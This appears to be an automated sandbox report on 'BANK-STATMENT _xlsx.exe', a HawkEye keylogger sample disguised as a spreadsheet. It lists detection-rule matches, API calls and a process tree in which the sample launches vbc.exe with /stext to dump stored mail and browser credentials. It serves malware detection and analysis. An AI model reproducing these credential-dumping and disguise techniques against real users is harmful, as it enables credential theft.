                Source: 00000022.00000002.912719183.0000000002402000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 00000022.00000002.912719183.0000000002402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 0000000F.00000002.803587831.0000000002F02000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 00000000.00000002.666309079.0000000002817000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 00000000.00000002.666309079.0000000002817000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 0000000F.00000002.797891393.0000000000497000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 0000000F.00000002.797891393.0000000000497000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 0000001D.00000002.885702309.0000000002F42000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 0000001C.00000002.870272329.0000000002837000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 0000001C.00000002.870272329.0000000002837000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 37.2.BANK-STATMENT _xlsx.exe.27c0000.3.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 37.2.BANK-STATMENT _xlsx.exe.27c0000.3.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 14.2.BANK-STATMENT _xlsx.exe.2640000.3.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 14.2.BANK-STATMENT _xlsx.exe.2640000.3.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 34.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 34.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 34.2.BANK-STATMENT _xlsx.exe.2360000.2.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 34.2.BANK-STATMENT _xlsx.exe.2360000.2.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 38.2.BANK-STATMENT _xlsx.exe.22c0000.2.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 38.2.BANK-STATMENT _xlsx.exe.22c0000.2.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 33.2.BANK-STATMENT _xlsx.exe.2640000.3.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 33.2.BANK-STATMENT _xlsx.exe.2640000.3.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 0.2.BANK-STATMENT _xlsx.exe.2780000.3.unpack, Form1.cs, Cryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                Source: 0.2.BANK-STATMENT _xlsx.exe.2780000.3.unpack, Form1.cs, Cryptographic APIs: 'CreateDecryptor'
                Source: 1.2.BANK-STATMENT _xlsx.exe.23b0000.3.unpack, Form1.cs, Cryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                Source: 1.2.BANK-STATMENT _xlsx.exe.23b0000.3.unpack, Form1.cs, Cryptographic APIs: 'CreateDecryptor'
                Source: 0.2.BANK-STATMENT _xlsx.exe.2780000.3.unpack, Form1.csBase64 encoded string: 'V9z0MtEfK2EI50ruA/sX5435SES1SZRTR7cTqTnmp3AxYZifJxwgy7QFTKhlmSGx', 'xs2M8HBBKsXOBp/txdt4WH36BZtFcWtpatuDMJkzHUo9RE6HRhBOXZQPez9CEdmS', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
                Source: 21.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, Form1.cs, Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                Source: 0.2.BANK-STATMENT _xlsx.exe.2780000.3.unpack, Form1.cs, Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                Source: 15.2.BANK-STATMENT _xlsx.exe.2250000.2.unpack, Form1.cs, Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                Source: 1.2.BANK-STATMENT _xlsx.exe.23b0000.3.unpack, Form1.cs, Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                Source: 1.2.BANK-STATMENT _xlsx.exe.2290000.2.unpack, Form1.cs, Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                Source: 15.2.BANK-STATMENT _xlsx.exe.2310000.3.unpack, Form1.cs, Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                Source: 15.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, Form1.cs, Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                Source: 20.2.BANK-STATMENT _xlsx.exe.26b0000.3.unpack, Form1.cs, Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                Source: 21.2.BANK-STATMENT _xlsx.exe.21e0000.2.unpack, Form1.cs, Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                Source: 1.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, Form1.cs, Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                Source: 14.2.BANK-STATMENT _xlsx.exe.2640000.3.unpack, Form1.cs, Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                Source: 21.2.BANK-STATMENT _xlsx.exe.22c0000.3.unpack, Form1.cs, Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                Source: classification engine, Classification label: mal100.phis.troj.spyw.evad.winEXE@53/29@20/4
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe, Code function: 0_2_00420114 GetLastError,FormatMessageA,0_2_00420114
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe, Code function: 0_2_00408ACA GetDiskFreeSpaceA,0_2_00408ACA
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe, Code function: 7_2_00411196 CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,QueryFullProcessImageNameW,CloseHandle,free,Process32NextW,CloseHandle,7_2_00411196
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe, Code function: 0_2_004168F4 FindResourceA,LoadResource,SizeofResource,LockResource,0_2_004168F4
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe, File created: C:\Users\user\AppData\Roaming\pid.txt
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe, Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe, File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER65F6.tmp
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe, Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe, Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe, Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe, Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe, System information queried: HandleInformation
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe, WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe, File read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe, File read: C:\Windows\System32\drivers\etc\hosts
                Source: BANK-STATMENT _xlsx.exe, vbc.exe, BANK-STATMENT _xlsx.exe, 0000000E.00000002.788401031.0000000002642000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000000F.00000002.803780001.0000000003A81000.00000004.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000014.00000002.826494513.0000000002747000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000015.00000002.852456722.0000000000402000.00000040.00000001.sdmp, vbc.exe, 0000001A.00000002.838140213.0000000000400000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001C.00000002.870010845.00000000027A2000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.883042234.0000000000AD0000.00000004.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000021.00000002.903399921.0000000002642000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000022.00000002.912614884.0000000002362000.00000004.00000001.sdmp, Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                Source: BANK-STATMENT _xlsx.exe, vbc.exe, BANK-STATMENT _xlsx.exe, 0000000E.00000002.788401031.0000000002642000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000000F.00000002.803780001.0000000003A81000.00000004.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000014.00000002.826494513.0000000002747000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000015.00000002.852456722.0000000000402000.00000040.00000001.sdmp, vbc.exe, 0000001A.00000002.838140213.0000000000400000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001C.00000002.870010845.00000000027A2000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.883042234.0000000000AD0000.00000004.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000021.00000002.903399921.0000000002642000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000022.00000002.912614884.0000000002362000.00000004.00000001.sdmp, Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                Source: BANK-STATMENT _xlsx.exe, 00000000.00000002.666309079.0000000002817000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000001.00000002.765706717.0000000000497000.00000040.00000001.sdmp, vbc.exe, 00000007.00000002.704959597.0000000000400000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000000E.00000002.788401031.0000000002642000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000000F.00000002.803780001.0000000003A81000.00000004.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000014.00000002.826494513.0000000002747000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000015.00000002.852456722.0000000000402000.00000040.00000001.sdmp, vbc.exe, 0000001A.00000002.838140213.0000000000400000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001C.00000002.870010845.00000000027A2000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.883042234.0000000000AD0000.00000004.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000021.00000002.903399921.0000000002642000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000022.00000002.912614884.0000000002362000.00000004.00000001.sdmp, Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                Source: BANK-STATMENT _xlsx.exe, vbc.exe, BANK-STATMENT _xlsx.exe, 0000000E.00000002.788401031.0000000002642000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000000F.00000002.803780001.0000000003A81000.00000004.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000014.00000002.826494513.0000000002747000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000015.00000002.852456722.0000000000402000.00000040.00000001.sdmp, vbc.exe, 0000001A.00000002.838140213.0000000000400000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001C.00000002.870010845.00000000027A2000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.883042234.0000000000AD0000.00000004.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000021.00000002.903399921.0000000002642000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000022.00000002.912614884.0000000002362000.00000004.00000001.sdmp, Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                Source: BANK-STATMENT _xlsx.exe, vbc.exe, BANK-STATMENT _xlsx.exe, 0000000E.00000002.788401031.0000000002642000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000000F.00000002.803780001.0000000003A81000.00000004.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000014.00000002.826494513.0000000002747000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000015.00000002.852456722.0000000000402000.00000040.00000001.sdmp, vbc.exe, 0000001A.00000002.838140213.0000000000400000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001C.00000002.870010845.00000000027A2000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.883042234.0000000000AD0000.00000004.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000021.00000002.903399921.0000000002642000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000022.00000002.912614884.0000000002362000.00000004.00000001.sdmp, Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                Source: BANK-STATMENT _xlsx.exe, vbc.exe, BANK-STATMENT _xlsx.exe, 0000000E.00000002.788401031.0000000002642000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000000F.00000002.803780001.0000000003A81000.00000004.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000014.00000002.826494513.0000000002747000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000015.00000002.852456722.0000000000402000.00000040.00000001.sdmp, vbc.exe, 0000001A.00000002.838140213.0000000000400000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001C.00000002.870010845.00000000027A2000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.883042234.0000000000AD0000.00000004.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000021.00000002.903399921.0000000002642000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000022.00000002.912614884.0000000002362000.00000004.00000001.sdmp, Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                Source: BANK-STATMENT _xlsx.exe, vbc.exe, BANK-STATMENT _xlsx.exe, 0000000E.00000002.788401031.0000000002642000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000000F.00000002.803780001.0000000003A81000.00000004.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000014.00000002.826494513.0000000002747000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000015.00000002.852456722.0000000000402000.00000040.00000001.sdmp, vbc.exe, 0000001A.00000002.838140213.0000000000400000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001C.00000002.870010845.00000000027A2000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.883042234.0000000000AD0000.00000004.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000021.00000002.903399921.0000000002642000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000022.00000002.912614884.0000000002362000.00000004.00000001.sdmp, Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                Source: BANK-STATMENT _xlsx.exe, Virustotal: Detection: 40%
                Source: BANK-STATMENT _xlsx.exe, ReversingLabs: Detection: 41%
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe, File read: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe
                Source: unknown, Process created: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe 'C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe'
                Source: unknown, Process created: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe 'C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe'
                Source: unknown, Process created: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe 'C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe' 2 4500 5715437
                Source: unknown, Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2264
                Source: unknown, Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
                Source: unknown, Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
                Source: unknown, Process created: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe
                Source: unknown, Process created: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe
                Source: unknown, Process created: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe 'C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe' 2 4240 5772140
                Source: unknown, Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2304
                Source: unknown, Process created: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe
                Source: unknown, Process created: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe
                Source: unknown, Process created: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe 'C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe' 2 1548 5785125
                Source: unknown, Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2288
                Source: unknown, Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
                Source: unknown, Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
                Source: unknown, Process created: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe
                Source: unknown, Process created: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe
                Source: unknown, Process created: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe 'C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe' 2 6180 5810484
                Source: unknown, Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2264
                Source: unknown, Process created: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe
                Source: unknownProcess created: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe
                Source: unknownProcess created: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe 'C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe' 2 5580 5822718
                Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2324
                Source: unknownProcess created: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe
                Source: unknownProcess created: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe
                Source: unknownProcess created: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe 'C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe' 2 2864 5836578
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess created: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe 'C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe'
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess created: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe 'C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe' 2 4500 5715437
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2264
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess created: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess created: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess created: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe 'C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe' 2 4240 5772140
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2304
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess created: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess created: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess created: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe 'C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe' 2 1548 5785125
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2288
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess created: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess created: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess created: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe 'C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe' 2 6180 5810484
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2264
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess created: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess created: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess created: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe 'C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe' 2 5580 5822718
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2324
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess created: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess created: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe
